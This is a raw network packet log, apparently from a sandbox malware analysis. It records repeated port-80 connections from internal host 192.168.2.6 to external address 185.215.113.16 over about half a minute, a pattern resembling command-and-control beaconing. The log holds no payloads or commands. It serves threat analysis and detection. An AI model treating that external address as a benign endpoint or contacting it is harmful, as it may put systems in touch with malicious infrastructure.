Sep 26, 2024 18:29:40.452814102 CEST	80	49754	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:40.870287895 CEST	80	49754	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:40.870620966 CEST	49754	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:40.981801033 CEST	49754	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:40.982172966 CEST	49755	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:41.217422962 CEST	80	49755	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:41.217567921 CEST	49755	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:41.217859030 CEST	49755	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:41.222835064 CEST	80	49755	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:41.223038912 CEST	80	49754	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:41.223109007 CEST	49754	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:41.919539928 CEST	80	49755	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:41.919644117 CEST	49755	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:41.950927019 CEST	49755	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:41.955914021 CEST	80	49755	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:42.178738117 CEST	80	49755	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:42.178879023 CEST	49755	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:42.294517040 CEST	49755	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:42.294991970 CEST	49756	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:43.106142998 CEST	49755	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:43.280826092 CEST	80	49756	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:43.280891895 CEST	80	49755	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:43.280910969 CEST	49756	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:43.281013966 CEST	80	49755	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:43.281074047 CEST	49755	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:43.281311989 CEST	49756	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:43.291233063 CEST	80	49756	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:44.007570982 CEST	80	49756	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:44.007628918 CEST	49756	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:44.008317947 CEST	49756	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:44.013163090 CEST	80	49756	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:44.237608910 CEST	80	49756	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:44.237818956 CEST	49756	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:44.341228008 CEST	49756	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:44.341602087 CEST	49757	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:44.346354008 CEST	80	49756	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:44.346422911 CEST	49756	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:44.346431017 CEST	80	49757	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:44.346530914 CEST	49757	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:44.346652985 CEST	49757	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:44.351829052 CEST	80	49757	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:45.056231022 CEST	80	49757	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:45.056343079 CEST	49757	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:45.057060003 CEST	49757	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:45.061899900 CEST	80	49757	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:45.288295031 CEST	80	49757	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:45.288440943 CEST	49757	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:45.403635979 CEST	49757	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:45.403940916 CEST	49758	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:45.408832073 CEST	80	49757	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:45.408848047 CEST	80	49758	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:45.408906937 CEST	49757	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:45.408956051 CEST	49758	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:45.409107924 CEST	49758	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:45.414081097 CEST	80	49758	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:46.138456106 CEST	80	49758	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:46.138545990 CEST	49758	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:46.141603947 CEST	49758	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:46.146737099 CEST	80	49758	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:46.376987934 CEST	80	49758	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:46.377096891 CEST	49758	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:46.481798887 CEST	49758	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:46.482237101 CEST	49759	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:46.487405062 CEST	80	49759	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:46.487514019 CEST	49759	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:46.487718105 CEST	49759	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:46.487883091 CEST	80	49758	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:46.487960100 CEST	49758	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:46.492645025 CEST	80	49759	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:47.221355915 CEST	80	49759	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:47.221479893 CEST	49759	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:47.222399950 CEST	49759	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:47.227735043 CEST	80	49759	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:47.453680038 CEST	80	49759	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:47.453769922 CEST	49759	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:47.560147047 CEST	49759	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:47.560543060 CEST	49760	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:47.565414906 CEST	80	49760	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:47.565551996 CEST	49760	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:47.565644026 CEST	80	49759	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:47.565699100 CEST	49759	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:47.565839052 CEST	49760	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:47.571014881 CEST	80	49760	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:48.265929937 CEST	80	49760	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:48.265995979 CEST	49760	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:48.267065048 CEST	49760	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:48.272113085 CEST	80	49760	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:48.492898941 CEST	80	49760	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:48.493122101 CEST	49760	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:48.606758118 CEST	49760	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:48.607175112 CEST	49761	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:48.611922026 CEST	80	49760	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:48.612004995 CEST	49760	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:48.612067938 CEST	80	49761	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:48.612150908 CEST	49761	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:48.612292051 CEST	49761	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:48.617218971 CEST	80	49761	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:49.313538074 CEST	80	49761	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:49.313752890 CEST	49761	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:49.314475060 CEST	49761	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:49.319283009 CEST	80	49761	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:49.540241003 CEST	80	49761	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:49.540349007 CEST	49761	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:49.653904915 CEST	49761	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:49.654202938 CEST	49762	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:49.665169001 CEST	80	49762	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:49.665210009 CEST	80	49761	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:49.665278912 CEST	49762	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:49.665337086 CEST	49761	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:49.665596008 CEST	49762	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:49.680759907 CEST	80	49762	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:50.374865055 CEST	80	49762	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:50.375042915 CEST	49762	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:50.375943899 CEST	49762	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:50.380891085 CEST	80	49762	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:50.602884054 CEST	80	49762	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:50.603038073 CEST	49762	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:50.716281891 CEST	49762	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:50.716607094 CEST	49763	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:50.722548962 CEST	80	49763	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:50.722631931 CEST	49763	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:50.722805977 CEST	49763	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:50.723309994 CEST	80	49762	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:50.723371983 CEST	49762	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:50.728099108 CEST	80	49763	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:51.432419062 CEST	80	49763	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:51.432650089 CEST	49763	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:51.433691025 CEST	49763	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:51.438582897 CEST	80	49763	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:51.659534931 CEST	80	49763	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:51.659589052 CEST	49763	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:51.762998104 CEST	49763	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:51.763410091 CEST	49764	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:51.768166065 CEST	80	49763	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:51.768233061 CEST	49763	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:51.768342972 CEST	80	49764	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:51.768531084 CEST	49764	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:51.768706083 CEST	49764	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:51.773648024 CEST	80	49764	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:52.477205038 CEST	80	49764	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:52.477272987 CEST	49764	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:52.479969978 CEST	49764	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:52.484776020 CEST	80	49764	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:52.703176022 CEST	80	49764	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:52.703305960 CEST	49764	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:52.809873104 CEST	49764	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:52.810218096 CEST	49765	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:52.815057039 CEST	80	49764	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:52.815125942 CEST	49764	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:52.815164089 CEST	80	49765	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:52.815243959 CEST	49765	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:52.815404892 CEST	49765	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:52.820473909 CEST	80	49765	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:53.529804945 CEST	80	49765	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:53.529912949 CEST	49765	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:53.530819893 CEST	49765	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:53.535756111 CEST	80	49765	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:53.763443947 CEST	80	49765	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:53.763766050 CEST	49765	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:53.872731924 CEST	49765	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:53.873047113 CEST	49766	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:53.878012896 CEST	80	49765	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:53.878029108 CEST	80	49766	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:53.878112078 CEST	49765	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:53.878155947 CEST	49766	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:53.878329992 CEST	49766	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:53.883169889 CEST	80	49766	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:54.596925020 CEST	80	49766	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:54.597135067 CEST	49766	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:54.597805977 CEST	49766	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:54.602670908 CEST	80	49766	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:54.829689980 CEST	80	49766	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:54.829847097 CEST	49766	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:54.935348988 CEST	49766	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:54.935605049 CEST	49767	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:54.942991972 CEST	80	49767	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:54.943120956 CEST	49767	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:54.943310976 CEST	49767	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:54.943391085 CEST	80	49766	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:54.943525076 CEST	49766	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:54.952076912 CEST	80	49767	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:55.695058107 CEST	80	49767	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:55.695125103 CEST	49767	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:55.696331978 CEST	49767	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:55.701191902 CEST	80	49767	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:55.925283909 CEST	80	49767	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:55.925400019 CEST	49767	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:56.028819084 CEST	49767	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:56.029246092 CEST	49768	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:56.034215927 CEST	80	49768	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:56.034235954 CEST	80	49767	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:56.034338951 CEST	49767	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:56.034357071 CEST	49768	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:56.034621954 CEST	49768	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:56.039648056 CEST	80	49768	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:56.743649006 CEST	80	49768	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:56.743801117 CEST	49768	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:56.744843960 CEST	49768	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:56.749654055 CEST	80	49768	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:56.970771074 CEST	80	49768	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:56.970927954 CEST	49768	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:57.078166008 CEST	49768	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:57.078586102 CEST	49769	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:57.083327055 CEST	80	49768	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:57.083420992 CEST	49768	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:57.083499908 CEST	80	49769	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:57.083578110 CEST	49769	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:57.083724976 CEST	49769	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:57.088511944 CEST	80	49769	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:57.802686930 CEST	80	49769	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:57.802808046 CEST	49769	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:57.803634882 CEST	49769	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:57.808455944 CEST	80	49769	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:58.032550097 CEST	80	49769	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:58.032661915 CEST	49769	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:58.138170958 CEST	49769	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:58.138554096 CEST	49770	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:58.144310951 CEST	80	49770	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:58.144458055 CEST	49770	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:58.144578934 CEST	49770	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:58.144602060 CEST	80	49769	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:58.144661903 CEST	49769	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:58.149468899 CEST	80	49770	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:58.841969013 CEST	80	49770	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:58.842158079 CEST	49770	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:58.843313932 CEST	49770	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:58.848186016 CEST	80	49770	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:59.069298029 CEST	80	49770	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:59.069416046 CEST	49770	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:59.184922934 CEST	49770	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:59.185345888 CEST	49771	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:59.190104961 CEST	80	49770	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:59.190182924 CEST	49770	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:59.190222025 CEST	80	49771	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:59.190325975 CEST	49771	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:59.190507889 CEST	49771	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:59.195631981 CEST	80	49771	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:59.910819054 CEST	80	49771	185.215.113.16	192.168.2.6
Sep 26, 2024 18:29:59.910917997 CEST	49771	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:59.911952972 CEST	49771	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:29:59.917046070 CEST	80	49771	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:00.151271105 CEST	80	49771	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:00.151345015 CEST	49771	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:00.269753933 CEST	49771	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:00.270395994 CEST	49772	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:00.275144100 CEST	80	49771	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:00.275409937 CEST	49771	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:00.275626898 CEST	80	49772	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:00.275718927 CEST	49772	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:00.279174089 CEST	49772	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:00.284040928 CEST	80	49772	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:01.011519909 CEST	80	49772	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:01.011730909 CEST	49772	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:01.015243053 CEST	49772	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:01.020073891 CEST	80	49772	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:01.248735905 CEST	80	49772	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:01.248928070 CEST	49772	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:01.357291937 CEST	49772	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:01.357667923 CEST	49773	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:01.362354994 CEST	80	49772	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:01.362437963 CEST	49772	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:01.362519979 CEST	80	49773	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:01.362591028 CEST	49773	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:01.362713099 CEST	49773	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:01.367790937 CEST	80	49773	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:02.074484110 CEST	80	49773	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:02.074552059 CEST	49773	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:02.075826883 CEST	49773	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:02.080583096 CEST	80	49773	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:02.313857079 CEST	80	49773	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:02.313966990 CEST	49773	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:02.422008991 CEST	49773	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:02.422368050 CEST	49774	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:02.427324057 CEST	80	49773	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:02.427417040 CEST	49773	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:02.427743912 CEST	80	49774	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:02.427809954 CEST	49774	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:02.427949905 CEST	49774	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:02.433229923 CEST	80	49774	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:03.158406973 CEST	80	49774	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:03.159107924 CEST	49774	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:03.161786079 CEST	49774	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:03.162091017 CEST	49775	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:03.166815042 CEST	80	49774	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:03.166874886 CEST	49774	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:03.166965008 CEST	80	49775	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:03.167032957 CEST	49775	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:03.167258978 CEST	49775	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:03.172082901 CEST	80	49775	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:03.871732950 CEST	80	49775	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:03.871799946 CEST	49775	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:03.985589981 CEST	49775	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:03.985994101 CEST	49776	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:03.990925074 CEST	80	49775	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:03.990976095 CEST	49775	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:03.991079092 CEST	80	49776	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:03.991151094 CEST	49776	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:03.991398096 CEST	49776	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:03.996418953 CEST	80	49776	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:04.689481020 CEST	80	49776	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:04.689548016 CEST	49776	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:04.693212032 CEST	49776	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:04.693716049 CEST	49778	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:04.698379040 CEST	80	49776	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:04.698436975 CEST	49776	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:04.698611975 CEST	80	49778	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:04.698682070 CEST	49778	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:04.698847055 CEST	49778	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:04.703995943 CEST	80	49778	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:05.413382053 CEST	80	49778	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:05.413450003 CEST	49778	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:05.531620979 CEST	49778	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:05.532120943 CEST	49779	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:05.536828995 CEST	80	49778	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:05.536955118 CEST	80	49779	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:05.537009001 CEST	49778	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:05.537046909 CEST	49779	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:05.537329912 CEST	49779	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:05.542252064 CEST	80	49779	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:06.278338909 CEST	80	49779	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:06.278625965 CEST	49779	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:06.281582117 CEST	49779	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:06.282033920 CEST	49780	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:06.287517071 CEST	80	49779	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:06.287806034 CEST	49779	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:06.287903070 CEST	80	49780	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:06.287967920 CEST	49780	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:06.288217068 CEST	49780	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:06.294047117 CEST	80	49780	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:07.007134914 CEST	80	49780	185.215.113.16	192.168.2.6
Sep 26, 2024 18:30:07.007332087 CEST	49780	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:07.124937057 CEST	49780	80	192.168.2.6	185.215.113.16
Sep 26, 2024 18:30:07.125313997 CEST	49781	80	192.168.2.6	185.215.113.16
